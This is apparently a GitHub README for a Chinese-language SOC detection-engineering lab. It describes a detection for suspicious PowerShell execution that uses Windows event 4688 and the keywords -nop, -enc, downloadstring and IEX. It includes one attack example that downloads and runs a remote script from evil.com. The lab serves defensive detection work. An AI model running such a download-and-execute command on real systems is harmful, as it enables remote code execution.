waelsk95l/Detection-Engineering-Lab

# 检测工程实验室 本仓库包含实用的 SOC 检测工程实验，专注于利用 Windows 日志和 Sysmon 检测攻击者技术。 本项目的目标是模拟现实世界的攻击技术，并构建 SOC 分析师和检测工程师所使用的检测逻辑。 ## 实验环境 - Windows 11 目标机 - Kali Linux 攻击机 - Sysmon 日志记录 - Windows 事件日志 - Sigma 检测规则 ## 检测用例 ### 用例 1 – 可疑的 PowerShell 执行 此检测用于识别可能表明恶意活动的可疑 PowerShell 命令。 **日志来源** Windows 安全日志 **事件 ID** 4688 – 进程创建 **检测逻辑** 当 PowerShell 使用以下可疑参数执行时触发警报： - -nop - -enc - downloadstring - IEX 攻击示例： powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/script.ps1')" **MITRE ATT&CK** T1059.001 – PowerShell ## SOC 调查步骤 - 调查进程树 - 识别父进程 - 检查网络连接 - 判断活动是否恶意 - 如有需要，隔离主机 .

标签：AI合规, AMSI绕过, Cloudflare, EDR, MITRE ATT&CK, OpenCanary, PowerShell 攻击, RFI远程文件包含, Sigma 规则, Sysmon, Windows 11, Windows 事件日志, Windows 安全, 可疑命令检测, 域名分析, 威胁检测, 安全实验室, 安全运营中心, 攻击模拟, 网络安全, 网络映射, 脆弱性评估, 隐私保护, 驱动签名利用